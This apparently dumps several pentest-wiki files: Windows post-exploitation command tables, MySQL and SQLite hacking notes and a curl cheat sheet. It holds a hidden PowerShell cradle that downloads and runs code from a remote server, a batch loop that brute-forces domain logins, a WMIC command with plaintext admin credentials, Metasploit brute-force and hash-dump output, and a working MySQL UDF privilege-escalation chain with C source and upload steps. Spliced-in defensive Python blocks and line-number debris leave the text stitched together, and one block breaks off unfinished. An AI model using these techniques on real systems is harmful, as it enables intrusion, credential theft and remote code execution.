|**Command**|**Description**|
|:----------|:--------------|
|ipconfig /all|Displays the full TCP/IP configuration for all adapters.|
|ipconfig /displaydns|Displays the contents of the DNS client resolver cache, which includes both entries preloaded from the local Hosts file and any recently obtained resource records for name queries resolved by the computer. The DNS Client service uses this information to resolve frequently queried names quickly, before querying its configured DNS servers.|
|netstat -ano|Displays active TCP connections and includes the process ID (PID) for each connection.|
|netstat -ano -p tcp|Show tcp connections.|
|netstat -ano -p udp|Show udp connections.|
|netstat -r|Displays the system's routing table.|
|route print|Displays the system's routing table.|
|net view|Displays a list of domains, computers, or resources that are being shared by the specified computer.|
|net view /domain:`DOMAINNAME`|Specifies the domain for which you want to view the available computers. If you omit DomainName, /domain displays all of the domains in the network.|
|net view \\\\`ComputerName`|Specifies the computer that contains the shared resources that you want to view.|
|wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"|Create a new process on a remote server.|
|powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"|Execute code from a remote server.|
|powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"|Download a file from a remote server.|

## File Systems

|**Command**|**Description**|
|:----------|:--------------|
|type C:\Windows\system32\demo.txt|Show the contents of a file.|
|dir /a|Displays files with specified attributes.|
|dir /s|Searches sub-directories|
|dir /s "\*`match-text`\*"|Searches for the word entered in the `match-text` section in all sub-dirs of the current directory.|
|find /I `password` C:\Windows\System32\*.ini|Searches for a `password` string in a file or files.|
|tree /F C:\Windows\system32|Graphically displays the folder structure of a drive or path.|
|fsutil fsinfo drives|Lists the current drives on the system.|
|wmic volume|Local storage volume management.|
|wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber|Local storage device management.|
|net share|Displays information about all of the resources that are shared on the local computer.|
|wmic share|Shared resource management.|
|net use \\\\`ip`\ipc$ `password` /user:`username`|Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.|
| 94 | |@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\\\DomainController\IPC$ /user:\%n %p 1>NUL 2>&1 && @echo [*] %n:%p &&|Bruteforce Windows accounts| 95 | |FOR /F %f in ('dir /b /s C:\') do find /I "password" %f|Search `password` in file or files from C:\| 96 | 97 | 98 | 99 | 100 | ## Startup and Shutdown 101 | 102 | |**Command**|**Description**| 103 | |:----------|:--------------| 104 | |wmic startup|Management of commands that run automatically when users log onto the computer system.| 105 | 106 | # Links 107 | 108 | 1. [Windows Internals Book](https://technet.microsoft.com/en-us/sysinternals/bb963901.aspx). 109 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Android-Assessment/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | ## Android Hacking and Security 6 | 7 | 1. [exploiting securing application components](http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/) 8 | 2. [content provider leakage](http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/) 9 | 3. [exploiting broadcast receivers](http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/) 10 | 4. [exploiting unintended data leakage side channel data leakage](http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/) 11 | 5. [debugging java applications using jdb](http://resources.infosecinstitute.com/android-hacking-security-part-5-debugging-java-applications-using-jdb/) 12 | 6. [exploiting debuggable android applications](http://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/) 13 | 7. 
[attacks android webviews](http://resources.infosecinstitute.com/android-hacking-security-part-7-attacks-android-webviews/) 14 | 8. [root detection evasion](http://resources.infosecinstitute.com/android-hacking-security-part-8-root-detection-evasion/) 15 | 9. [insecure local storage shared preferences](http://resources.infosecinstitute.com/android-hacking-security-part-9-insecure-local-storage-shared-preferences/) 16 | 10. [insecure local storage](http://resources.infosecinstitute.com/android-hacking-security-part-10-insecure-local-storage/) 17 | 11. [blackbox assessments introspy](http://resources.infosecinstitute.com/android-hacking-security-part-11-blackbox-assessments-introspy/) 18 | 12. [securing shared preferences third party libraries](http://resources.infosecinstitute.com/android-hacking-security-part-12-securing-shared-preferences-third-party-libraries/) 19 | 13. [introduction drozer](http://resources.infosecinstitute.com/android-hacking-security-part-13-introduction-drozer/) 20 | 14. [examining android app specific data non rooted devices](http://resources.infosecinstitute.com/android-hacking-security-part-14-examining-android-app-specific-data-non-rooted-devices/) 21 | 15. [hacking android apps using backup techniques](http://resources.infosecinstitute.com/android-hacking-security-part-15-hacking-android-apps-using-backup-techniques/) 22 | 16. [broken cryptography](http://resources.infosecinstitute.com/android-hacking-security-part-16-broken-cryptography/) 23 | 17. [cracking android app binaries](http://resources.infosecinstitute.com/android-hacking-security-part-17-cracking-android-app-binaries/) 24 | 18. [introduction to reverse engineering](http://resources.infosecinstitute.com/android-hacking-and-security-part-18-introduction-to-reverse-engineering/) 25 | 19. [insecure data storage with nosql databases](http://resources.infosecinstitute.com/android-hacking-and-security-part-19-insecure-data-storage-with-nosql-databases/) 26 | 20. 
[debugging apps on android emulator using gdb](http://resources.infosecinstitute.com/android-hacking-and-security-part-20-debugging-apps-on-android-emulator-using-gdb/) 27 | 28 | ## Android reverse engineering 29 | 30 | 1. http://www.fasteque.com/android-reverse-engineering-101-part-1/ 31 | 2. http://www.fasteque.com/android-reverse-engineering-101-part-2/ 32 | 3. http://www.fasteque.com/android-reverse-engineering-101-part-3/ 33 | 4. http://www.fasteque.com/android-reverse-engineering-101-part-4/ 34 | 5. http://www.fasteque.com/android-reverse-engineering-101-part-5/ 35 | 36 | 37 | ## [Android Security and Exploitation for Pentesters](http://www.pentesteracademy.com/course?id=24) 38 | 39 | 00. introduction 40 | 01. Android-Security-Introduction 41 | 02. Android-Architecture 42 | 03. Android-Permissions 43 | 04. Android-Applications 44 | 05. Setting-up-Genymotion 45 | 06. Android-Application-Components 46 | 07. Dex-Analysis 47 | 08. Android-Debug-Bridge 48 | 09. Logging-based-vulnerabilities 49 | 10. Application-Reversing 50 | 11. Analyzing-Android-Malwares 51 | 12. Traffic-Analysis 52 | 13. SSL-Pinning 53 | 14. Leaking-Content-Providers 54 | 15. Drozer-Kung-Fu 55 | 16. Read-Based-Content-Provider-Vulnerability 56 | 17. Advanced-Drozer-Kung-Fu 57 | 18. Drozer-Scripting 58 | 19. Dropbox-Vulnerability 59 | 20. Backup-based-vulnerabilities 60 | 21. Client-Side-Injection 61 | 22. Hooking-Introduction-and-Setting-up-InsecureBankSetup 62 | 23. Android-Debugging-with-Andbug 63 | 24. Debugging-with-JDB 64 | 25. Automated-Hooking-with-Introspy 65 | 26. Cydia-Substrate 66 | 27. Hooking-using-Xposed 67 | 28. Androguard-Scripting-and-Analysis 68 | 29. Webview-based-vulnerabilities 69 | 30. Exploiting-Webviews-with-Metasploit 70 | 71 | ## Books 72 | 73 | 1. Android Security Cookbook 74 | 2. Android Hacker's Handbook 75 | 3. 
Learning Pentesting for Android Devices 76 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB Pentesting for Absolute Beginners.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB Pentesting for Absolute Beginners.pdf -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB_Lab.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB_Lab.zip -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/mysql/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Mysql Hacking 6 | 7 | |**Command**|**Description**| 8 | |:----------|:--------------| 9 | |select @@version|Show mysql server version| 10 | |select version()|Show mysql server version| 11 | |SHOW STATUS|Show mysql server status information| 12 | |show VARIABLES|Show all mysql server variables| 13 | |select user()|Query current database user| 14 | |SHOW VARIABLES LIKE '%datadir%'|Show all variables which include datadir string| 15 | |select load_file('/etc/passwd');|Load file into database| 16 | |select 0xnnnnnn... INTO **OUTFILE** '/path/to/filename'|Write data into a text file.| 17 | |select 0xnnnnnn... INTO **DUMPFILE** '/path/to/filename'|Write data into a binary file.| 18 | 19 | ## How to install mysql server ? 
20 | 21 | Lab: ubuntu / debian 22 | 23 | ``` 24 | $ sudo apt-get install mysql-server 25 | $ sudo systemctl start service 26 | ``` 27 | 28 | Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`, and change the **bind-address**. 29 | 30 | ``` 31 | bind-address = 0.0.0.0 32 | ``` 33 | 34 | ## Allow remote access 35 | 36 | ``` 37 | root@sh:~# ss -ant | grep ":3306" 38 | LISTEN 0 80 *:3306 *:* 39 | root@sh:~# mysql -h 10.0.250.71 -uroot -p 40 | Enter password: 41 | ERROR 1130 (HY000): Host '10.0.250.71' is not allowed to connect to this MySQL server 42 | ``` 43 | 44 | Create a sql file called **adduser.sql**, and execute the command: `mysql -h 127.0.0.1 -u root -p mysql < adduser.sql` 45 | 46 | ``` 47 | CREATE USER 'mysqlsec'@'localhost' IDENTIFIED BY 'password'; 48 | GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'localhost' WITH GRANT OPTION; 49 | CREATE USER 'mysqlsec'@'%' IDENTIFIED BY 'password'; 50 | GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'%' WITH GRANT OPTION; 51 | ``` 52 | 53 | If successful, you can access the mysql server remotely. 54 | 55 | ``` 56 | root@sh:~# mysql -h 10.0.250.71 -u mysqlsec -p mysql 57 | Enter password: 58 | Reading table information for completion of table and column names 59 | You can turn off this feature to get a quicker startup with -A 60 | 61 | Welcome to the MySQL monitor. Commands end with ; or \g. 62 | Your MySQL connection id is 8 63 | Server version: 5.6.30-1 (Debian) 64 | 65 | Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved. 66 | 67 | Oracle is a registered trademark of Oracle Corporation and/or its 68 | affiliates. Other names may be trademarks of their respective 69 | owners. 70 | 71 | Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 
72 | 73 | mysql> 74 | mysql> select Host,User,Password from `mysql`.`user` where User='mysqlsec'; 75 | +-----------+----------+-------------------------------------------+ 76 | | Host | User | Password | 77 | +-----------+----------+-------------------------------------------+ 78 | | localhost | mysqlsec | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | 79 | | % | mysqlsec | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | 80 | +-----------+----------+-------------------------------------------+ 81 | 2 rows in set (0.00 sec) 82 | ``` 83 | 84 | ## How to crack mysql ? 85 | 86 | ``` 87 | msf auxiliary(mysql_login) > show options 88 | 89 | Module options (auxiliary/scanner/mysql/mysql_login): 90 | 91 | Name Current Setting Required Description 92 | ---- --------------- -------- ----------- 93 | BLANK_PASSWORDS false no Try blank passwords for all users 94 | BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 95 | DB_ALL_CREDS false no Try each user/password couple stored in the current database 96 | DB_ALL_PASS false no Add all passwords in the current database to the list 97 | DB_ALL_USERS false no Add all users in the current database to the list 98 | PASSWORD no A specific password to authenticate with 99 | PASS_FILE /tmp/pass.txt no File containing passwords, one per line 100 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
101 | RHOSTS 10.0.250.71 yes The target address range or CIDR identifier 102 | RPORT 3306 yes The target port 103 | STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host 104 | THREADS 10 yes The number of concurrent threads 105 | USERNAME mysqlsec no A specific username to authenticate as 106 | USERPASS_FILE no File containing users and passwords separated by space, one pair per line 107 | USER_AS_PASS false no Try the username as the password for all users 108 | USER_FILE no File containing usernames, one per line 109 | VERBOSE true yes Whether to print output for all attempts 110 | 111 | msf auxiliary(mysql_login) > run 112 | 113 | [*] 10.0.250.71:3306 - 10.0.250.71:3306 - Found remote MySQL version 5.6.30 114 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:AzVJmX (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 115 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:j1Uyj3 (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 116 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:root (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 117 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:mysql (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 118 | [+] 10.0.250.71:3306 - MYSQL - Success: 'mysqlsec:password' 119 | [*] Scanned 1 of 1 hosts (100% complete) 120 | [*] Auxiliary module execution completed 121 | ``` 122 | 123 | ## How to dump mysql hash ? 
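The `mysqlsec` grants above (ALL PRIVILEGES on *.* for '%'), the `INTO DUMPFILE` rows of the command table and the UDF privilege-escalation section further down all hinge on three server-side facts: whether `secure_file_priv` restricts file writes, whether the permitted path covers `plugin_dir`, and which accounts hold FILE plus INSERT on the `mysql` database. The audit below is an added example, not code from the original page: it evaluates captured `SHOW VARIABLES`, `SHOW GRANTS` and `mysql.func` output on a constructed sample that mirrors the page's lab, and assumes `plugin_dir` is writable by the mysqld OS user (it does not check filesystem permissions).

```python
"""Audit the MySQL settings that the INTO DUMPFILE / UDF steps depend on.

Added example, not code from the original page. Input is text an admin
already has: SHOW VARIABLES (secure_file_priv, plugin_dir), SHOW GRANTS
lines, and rows of SELECT name, dl FROM mysql.func. Assumes plugin_dir is
writable by the mysqld OS user, as in the page's lab.
"""
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<obj>\S+) TO '(?P<user>[^']*)'@'(?P<host>[^']*)'")
GLOBAL_ALL = {"ALL", "ALL PRIVILEGES"}

# Constructed sample capture mirroring the page's lab (not real server output).
SAMPLE_VARIABLES: Dict[str, Optional[str]] = {
    "secure_file_priv": "",                  # '' = no restriction on file I/O
    "plugin_dir": "/usr/lib/mysql/plugin/",  # where CREATE FUNCTION ... SONAME looks
}
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'%' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'app'@'10.0.250.%'",
    "GRANT SELECT, INSERT ON `shop`.* TO 'app'@'10.0.250.%'",
]
SAMPLE_FUNCS = [("do_system", "lib_mysqludf_sys.so")]


def parse_grant(line: str) -> Optional[Tuple[str, str, Set[str], str]]:
    """Split one SHOW GRANTS line into (user, host, privilege set, object)."""
    m = GRANT_RE.match(line.strip())
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return m.group("user"), m.group("host"), privs, m.group("obj")


def can_write_server_files(privs: Set[str], obj: str) -> bool:
    """FILE is a global privilege; SELECT ... INTO DUMPFILE requires it."""
    return obj == "*.*" and bool(privs & (GLOBAL_ALL | {"FILE"}))


def can_register_udf(privs: Set[str], obj: str) -> bool:
    """CREATE FUNCTION ... SONAME inserts a row into mysql.func, so INSERT on
    the mysql database (or a global ALL/INSERT) enables the final step."""
    if obj == "*.*":
        return bool(privs & (GLOBAL_ALL | {"INSERT"}))
    return obj in ("`mysql`.*", "mysql.*") and bool(privs & (GLOBAL_ALL | {"INSERT"}))


def file_priv_covers_plugin_dir(secure_file_priv: Optional[str], plugin_dir: str) -> bool:
    """True when INTO DUMPFILE may land inside plugin_dir: NULL disables file
    import/export entirely, '' imposes no limit, a directory confines it."""
    if secure_file_priv is None or secure_file_priv.strip().upper() == "NULL":
        return False
    if secure_file_priv == "":
        return True
    allowed = secure_file_priv.rstrip("/") + "/"
    return (plugin_dir.rstrip("/") + "/").startswith(allowed)


def audit(variables: Dict[str, Optional[str]], grants: Iterable[str],
          funcs: Iterable[Tuple[str, str]], known_libs: Set[str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing to fix."""
    findings: List[str] = []
    sfp = variables.get("secure_file_priv", "")
    plugin_dir = variables.get("plugin_dir") or ""
    plugin_writable = file_priv_covers_plugin_dir(sfp, plugin_dir)
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE/DUMPFILE and "
                        "LOAD_FILE are unrestricted")
    elif plugin_writable:
        findings.append(f"secure_file_priv ({sfp}) still covers plugin_dir {plugin_dir}")
    # Merge every grant an account holds before deciding what it can do.
    caps: Dict[str, Dict[str, bool]] = {}
    for line in grants:
        parsed = parse_grant(line)
        if parsed is None:
            findings.append(f"could not parse grant line, review manually: {line}")
            continue
        user, host, privs, obj = parsed
        entry = caps.setdefault(f"'{user}'@'{host}'", {"file": False, "udf": False})
        entry["file"] |= can_write_server_files(privs, obj)
        entry["udf"] |= can_register_udf(privs, obj)
    for account, c in caps.items():
        if c["file"] and c["udf"] and plugin_writable:
            findings.append(f"{account} can write a shared object into plugin_dir "
                            "and register it as a UDF")
        elif c["file"]:
            findings.append(f"{account} holds the FILE privilege (server-side file read/write)")
        if account.endswith("@'%'") and (c["file"] or c["udf"]):
            findings.append(f"{account} is a privileged account reachable from any host")
    # UDFs already registered that the administrator did not install.
    for name, library in funcs:
        if library not in known_libs:
            findings.append(f"mysql.func registers {name} from unexpected library {library}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_VARIABLES, SAMPLE_GRANTS, SAMPLE_FUNCS, set()):
        print("[!]", finding)
```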
```
msf auxiliary(mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.0.250.71      yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  mysqlsec         no        The username to authenticate as

msf auxiliary(mysql_hashdump) > run

[+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306 - Saving HashString as Loot: debian-sys-maint:*8E970943FBFAA7CF6A11A55677E8050B725D9919
[+] 10.0.250.71:3306 - Saving HashString as Loot: phpmyadmin:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306 - Saving HashString as Loot: freepbxuser:*433D16EECA646A6CCF8F024AD8CDDC070C6791C1
[+] 10.0.250.71:3306 - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.0.250.71:3306 - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## UDF Privilege Escalation

```
#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
    unsigned int arg_count;       // number of arguments
    enum Item_result *arg_type;   // pointer to item_result
    char **args;                  // pointer to arguments
    unsigned long *lengths;       // length of string args
    char *maybe_null;             // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
    char maybe_null;              // 1 if func can return NULL
    unsigned int decimals;        // for real functions
    unsigned long max_length;     // for string functions
    char *ptr;                    // free ptr for func data
    char const_item;              // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    if (args->arg_count != 1)
        return(0);

    system(args->args[0]);

    return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
    return(0);
}
```

```
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

Compile the above code into a .so library. Next, convert the .so into a hex string:

```
#!/usr/bin/python
# -*- coding: utf8 -*-

# https://www.exploit-db.com/exploits/1518/

# How to upload UDF DLL into mysql server ?
# show VARIABLES;
# select @@plugin_dir;
# SELECT CHAR (...) INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
# SELECT 0xnnnnn INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
# drop function if exists do_system
# create function do_system returns integer soname 'lib_mysqludf_sys.so';
# select sys_exec('id');

# How to Compile UDF Dll ?
# gcc -g -c raptor_udf2.c
# gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

import sys
import binascii


def convert(filename):
    # Read the shared object as bytes and print it as one hex string
    with open(filename, 'rb') as f:
        print(binascii.hexlify(f.read()).decode())


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("python {} /path/to/lib_mysqludf_sys.so".format(sys.argv[0]))
    else:
        convert(sys.argv[1])
```

Upload the .so file and call the MySQL user-defined function named **do_system**.

```
mysql > select @@plugin_dir;
mysql > SELECT 0x7f45........0000 INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
mysql > drop function if exists do_system
mysql > create function do_system returns integer soname 'lib_mysqludf_sys.so';
mysql > select do_system('id > /tmp/result.log');
mysql > select load_file('/tmp/result.log');
```

## Mof Privilege Escalation

If MySQL runs on Windows, try these Metasploit modules:

```
msf >
use exploit/windows/mysql/mysql_mof
use exploit/windows/mysql/mysql_start_up
use exploit/windows/mysql/scrutinizer_upload_exec
use exploit/windows/mysql/mysql_payload
use exploit/windows/mysql/mysql_yassl_hello
```

With enough privilege, you can also write data into OS files (boot, cron, and so on).

# Links

1. http://www.mysqltutorial.org/mysql-cheat-sheet.aspx
2. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
3. https://www.rapid7.com/db/modules/exploit/windows/mysql/mysql_mof
4. http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html

--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/Database-Assessment/sqlite/curl_hacking.md:
--------------------------------------------------------------------------------

# CURL #

----

## GENERAL ##

```
curl http://curl.haxx.se
curl http://site.{one,two,three}.com
curl ftp://ftp.numericals.com/file[1-100].txt
curl ftp://ftp.numericals.com/file[001-100].txt
curl ftp://ftp.letters.com/file[a-z].txt

curl http://any.org/archive[1996-1999]/vol[1-4]/part{a,b,c}.html

curl http://www.numericals.com/file[1-100:10].txt
curl http://www.letters.com/file[a-z:2].txt

curl -o index.html http://curl.haxx.se/
curl http://curl.haxx.se/ > index.html

curl -# http://curl.haxx.se/ > index.html

curl -0 http://curl.haxx.se/
curl --http1.1 http://curl.haxx.se/
curl --http2 http://curl.haxx.se/

curl -1 http://curl.haxx.se/
curl --tlsv1 http://curl.haxx.se/

curl -2 http://curl.haxx.se/
curl --sslv2 http://curl.haxx.se/

curl -3 http://curl.haxx.se/
curl --sslv3 http://curl.haxx.se/

curl -4 http://curl.haxx.se/
curl --ipv4 http://curl.haxx.se/

curl -6 http://curl.haxx.se/
curl --ipv6 http://curl.haxx.se/

curl -A "wget/1.0" http://curl.haxx.se/
curl --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" [URL]
curl --user-agent "Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)" [URL]

curl -b "phpsession=Testtest" http://demo.com/
curl --cookie "name=Daniel" http://curl.haxx.se

curl -c cookies.txt http://curl.haxx.se/
curl --cookie-jar cookies.txt http://curl.haxx.se

curl -d "username=admin&password=pass" http://curl.haxx.se/
curl --data "birthyear=1905&press=%20OK%20" http://curl.haxx.se/when.cgi
curl --data-urlencode "name=I am Daniel" http://curl.haxx.se
curl --data "" --header "Content-Type: text/xml" --request PROPFIND url.com

curl -e "http://referer" http://demo.com/
curl --referer http://curl.haxx.see http://curl.haxx.se

curl --header "Host:" http://curl.haxx.se
curl --header "Destination: http://nowhere" http://curl.haxx.se

curl -D - http://curl.haxx.se/
curl --dump-header headers_and_cookies http://curl.haxx.se

curl -L http://github.com/
curl --location http://curl.haxx.se

curl --dns-servers 8.8.8.8 http://demo.com/

curl --trace-ascii debugdump.txt http://curl.haxx.se/
curl --form upload=@localfilename --form press=OK [URL]
curl --upload-file uploadfile http://curl.haxx.se/receive.cgi
curl --user name:password http://curl.haxx.se
curl --proxy-user proxyuser:proxypassword curl.haxx.se

curl --cert mycert.pem https://secure.example.com
```

----

# REFERENCES #

$ man curl
http://curl.haxx.se/docs/manual.html
http://curl.haxx.se/docs/httpscripting.html
http://httpkit.com/resources/HTTP-from-the-Command-Line/

--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/Database-Assessment/sqlite/sqlite_hacking.md:
--------------------------------------------------------------------------------

**Authors**: < [nixawk](https://github.com/nixawk) >

----

# SQLITE HACKING #

----

## CONNECT TO DATABASE ##

Start by typing the `sqlite3` command at the shell prompt; it opens the SQLite command prompt, where you issue the various SQLite commands.

```
┌─[lab@core]─[~/share/pentestlab/Darknet]
└──╼ sqlite3 temp.db
SQLite version 3.8.10.2 2015-05-20 18:17:19
Enter ".help" for usage hints.
sqlite> .help
.backup ?DB? FILE      Backup DB (default "main") to FILE
.bail on|off           Stop after hitting an error.  Default OFF
.binary on|off         Turn binary output on or off.  Default OFF
.clone NEWDB           Clone data into NEWDB from the existing database
.databases             List names and files of attached databases
.dbinfo ?DB?           Show status information about the database
.dump ?TABLE? ...      Dump the database in an SQL text format
                         If TABLE specified, only dump tables matching
                         LIKE pattern TABLE.
.echo on|off           Turn command echo on or off
.eqp on|off            Enable or disable automatic EXPLAIN QUERY PLAN
.exit                  Exit this program
.explain ?on|off?      Turn output mode suitable for EXPLAIN on or off.
                         With no args, it turns EXPLAIN on.
.fullschema            Show schema and the content of sqlite_stat tables
.headers on|off        Turn display of headers on or off
.help                  Show this message
.import FILE TABLE     Import data from FILE into TABLE
.indexes ?TABLE?       Show names of all indexes
                         If TABLE specified, only show indexes for tables
                         matching LIKE pattern TABLE.
.limit ?LIMIT? ?VAL?   Display or change the value of an SQLITE_LIMIT
.load FILE ?ENTRY?     Load an extension library
.log FILE|off          Turn logging on or off.  FILE can be stderr/stdout
.mode MODE ?TABLE?     Set output mode where MODE is one of:
                         ascii    Columns/rows delimited by 0x1F and 0x1E
                         csv      Comma-separated values
                         column   Left-aligned columns.  (See .width)
                         html     HTML code
                         insert   SQL insert statements for TABLE
                         line     One value per line
                         list     Values delimited by .separator strings
                         tabs     Tab-separated values
                         tcl      TCL list elements
.nullvalue STRING      Use STRING in place of NULL values
.once FILENAME         Output for the next SQL command only to FILENAME
.open ?FILENAME?       Close existing database and reopen FILENAME
.output ?FILENAME?     Send output to FILENAME or stdout
.print STRING...       Print literal STRING
.prompt MAIN CONTINUE  Replace the standard prompts
.quit                  Exit this program
.read FILENAME         Execute SQL in FILENAME
.restore ?DB? FILE     Restore content of DB (default "main") from FILE
.save FILE             Write in-memory database into FILE
.scanstats on|off      Turn sqlite3_stmt_scanstatus() metrics on or off
.schema ?TABLE?        Show the CREATE statements
                         If TABLE specified, only show tables matching
                         LIKE pattern TABLE.
.separator COL ?ROW?   Change the column separator and optionally the row
                         separator for both the output mode and .import
.shell CMD ARGS...     Run CMD ARGS... in a system shell
.show                  Show the current values for various settings
.stats on|off          Turn stats on or off
.system CMD ARGS...    Run CMD ARGS... in a system shell
.tables ?TABLE?        List names of tables
                         If TABLE specified, only list tables matching
                         LIKE pattern TABLE.
.timeout MS            Try opening locked tables for MS milliseconds
.timer on|off          Turn SQL timer on or off
.trace FILE|off        Output each SQL statement as it is run
.vfsname ?AUX?         Print the name of the VFS stack
.width NUM1 NUM2 ...   Set column widths for "column" mode
                         Negative values right-justify
```

----

## GENERATE ##

Common sqlite features (comments, concatenation, substr, hex, quote, ...)
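The WRITE FILE section further down shows that `ATTACH DATABASE '/tmp/evil.php'` plus one INSERT creates a valid SQLite file at an attacker-chosen path, with the inserted text sitting verbatim in its pages (the page's `strings` output shows it). As an added detection example (not code from the original page), the scanner below walks a directory tree and flags files that combine the 16-byte SQLite header with a web-executable extension or an embedded script marker; the sample tree it checks is constructed in a temporary directory with a harmless marker string in place of a payload.

```python
"""Flag SQLite database files dropped where a web server would execute them.

Added example, not part of the original page. The WRITE FILE trick leaves a
valid SQLite file whose first 16 bytes are the SQLite header and whose data
pages carry inserted TEXT values verbatim. This scanner reports files that
combine that header with a web-executable extension or a script marker.
The sample tree below is constructed; it is not taken from any real host.
"""
import os
import sqlite3
import tempfile
from typing import List, Tuple

SQLITE_MAGIC = b"SQLite format 3\x00"
WEB_EXEC_EXT = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl"}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"#!/")


def classify_file(path: str) -> List[str]:
    """Reasons a file looks like an SQLite-based dropper; empty when clean."""
    try:
        with open(path, "rb") as f:
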